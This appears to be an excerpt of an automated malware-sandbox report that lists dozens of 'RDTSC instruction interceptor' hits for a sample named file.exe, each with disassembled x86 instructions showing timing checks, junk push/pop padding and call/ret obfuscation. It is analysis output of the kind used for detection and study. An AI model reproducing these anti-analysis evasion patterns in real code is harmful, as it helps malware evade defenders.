Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 928554 second address: 92855E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA1ECFCB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9393C8 second address: 9393DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947EF0 second address: 947F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA1ECFCB29Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947F02 second address: 947F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945EE8 second address: 945F14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jo 00007FA1ECFCB296h 0x00000013 popad 0x00000014 jmp 00007FA1ECFCB2A8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F14 second address: 945F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA1ED006906h 0x0000000a jmp 00007FA1ED006916h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946104 second address: 946116 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1ECFCB296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FA1ECFCB296h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9463A6 second address: 9463E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006910h 0x00000007 js 00007FA1ED006906h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA1ED006919h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9463E2 second address: 9463E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9463E6 second address: 9463F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9463F4 second address: 9463FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94655C second address: 946560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946560 second address: 946572 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB29Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946572 second address: 94657A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94657A second address: 946594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946B77 second address: 946B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946B7B second address: 946B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946CB4 second address: 946CBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946F7A second address: 946F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FA1ECFCB2A2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93F263 second address: 93F269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94C5AE second address: 94C5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1ECFCB2A1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94C5C9 second address: 94C5CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94B307 second address: 94B31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB29Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9524AA second address: 9524BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jnl 00007FA1ED006906h 0x0000000c jg 00007FA1ED006906h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952C96 second address: 952C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952E1E second address: 952E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952E22 second address: 952E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007FA1ECFCB2D2h 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952E34 second address: 952E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FA1ED006906h 0x0000000d jmp 00007FA1ED006915h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956718 second address: 956726 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956726 second address: 95672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95672F second address: 956733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956733 second address: 956752 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FA1ED006906h 0x00000015 popad 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956752 second address: 956758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956758 second address: 95677C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006916h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95677C second address: 95679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+12456013h] 0x0000000d push 15A062CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jbe 00007FA1ECFCB296h 0x0000001b jg 00007FA1ECFCB296h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956C0E second address: 956C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956C14 second address: 956C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jbe 00007FA1ECFCB29Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956C31 second address: 956C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9572FC second address: 95730D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB29Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9573B5 second address: 9573B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9573B9 second address: 9573CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB29Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9575AF second address: 9575B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9575B3 second address: 9575B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957681 second address: 957687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957687 second address: 95768B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95768B second address: 95768F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957E24 second address: 957E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957E28 second address: 957E9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA1ED006908h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push edi 0x00000027 jmp 00007FA1ED006913h 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f movsx esi, bx 0x00000032 push 00000000h 0x00000034 or esi, dword ptr [ebp+122D1AA0h] 0x0000003a xchg eax, ebx 0x0000003b jmp 00007FA1ED006914h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958729 second address: 958744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB2A7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9585EF second address: 9585F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9585F5 second address: 9585F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A102 second address: 95A108 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AAF9 second address: 95AAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AAFF second address: 95AB04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AB04 second address: 95AB21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96052C second address: 96054B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA1ED006911h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 961501 second address: 961513 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007FA1ECFCB29Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96251C second address: 962526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA1ED006906h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95D39F second address: 95D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9616B6 second address: 9616BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9616BA second address: 9616C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964673 second address: 964681 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FA1ED006906h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9616C0 second address: 9616C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9637D2 second address: 9637DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1ED00690Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9616C5 second address: 961767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a or dword ptr [ebp+122D1A9Ah], ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 pushad 0x00000018 call 00007FA1ECFCB29Ch 0x0000001d js 00007FA1ECFCB296h 0x00000023 pop edx 0x00000024 mov edx, dword ptr [ebp+122D39BFh] 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FA1ECFCB298h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov dword ptr [ebp+12454CF6h], ecx 0x00000052 mov eax, dword ptr [ebp+122D0745h] 0x00000058 jng 00007FA1ECFCB2A7h 0x0000005e jmp 00007FA1ECFCB2A1h 0x00000063 push FFFFFFFFh 0x00000065 mov di, 440Ch 0x00000069 nop 0x0000006a push ebx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FA1ECFCB2A8h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9637DC second address: 9637E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 961767 second address: 96176B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96493E second address: 964944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96589E second address: 9658A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96176B second address: 96178A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FA1ED006915h 0x00000010 jmp 00007FA1ED00690Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE41 second address: 91CE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963895 second address: 96389B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964944 second address: 96494A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE47 second address: 91CE59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007FA1ED006906h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96389B second address: 96389F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE59 second address: 91CE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA1ED006906h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jbe 00007FA1ED006925h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE6E second address: 91CE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB2A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CE8B second address: 91CEA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ED006914h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CEA3 second address: 91CEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91CEA7 second address: 91CEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96A916 second address: 96A971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D3475h], ebx 0x00000012 push 00000000h 0x00000014 sub di, CE90h 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+1247613Eh], esi 0x00000021 mov ebx, dword ptr [ebp+122D2D2Fh] 0x00000027 xchg eax, esi 0x00000028 jl 00007FA1ECFCB2A2h 0x0000002e push eax 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FA1ECFCB2A2h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AAF4 second address: 96AAF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AAF8 second address: 96AB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnl 00007FA1ECFCB2A4h 0x0000000e nop 0x0000000f xor dword ptr [ebp+1245F600h], edi 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FA1ECFCB298h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 mov edi, dword ptr [ebp+122D2FEEh] 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 call 00007FA1ECFCB29Dh 0x00000048 mov edi, dword ptr [ebp+122D3787h] 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D1675h] 0x00000055 mov ebx, edi 0x00000057 mov ebx, dword ptr [ebp+1246D4E4h] 0x0000005d push FFFFFFFFh 0x0000005f clc 0x00000060 nop 0x00000061 jmp 00007FA1ECFCB29Dh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push ebx 0x0000006a jmp 00007FA1ECFCB2A2h 0x0000006f pop ebx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C8C1 second address: 96C8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED006917h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FA1ED006914h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96C8F9 second address: 96C97B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FA1ECFCB298h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D1CB6h] 0x0000002a push 00000000h 0x0000002c jmp 00007FA1ECFCB29Eh 0x00000031 push 00000000h 0x00000033 and bx, 007Eh 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a push edi 0x0000003b jnc 00007FA1ECFCB296h 0x00000041 pop edi 0x00000042 jmp 00007FA1ECFCB29Ah 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push esi 0x0000004e pop esi 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FA1ECFCB29Eh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96D871 second address: 96D8E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FA1ED006906h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FA1ED006918h 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D187Bh], eax 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FA1ED006908h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jmp 00007FA1ED00690Fh 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e pop ebx 0x0000003f mov bl, 62h 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 js 00007FA1ED006906h 0x0000004b jno 00007FA1ED006906h 0x00000051 popad 0x00000052 rdtsc
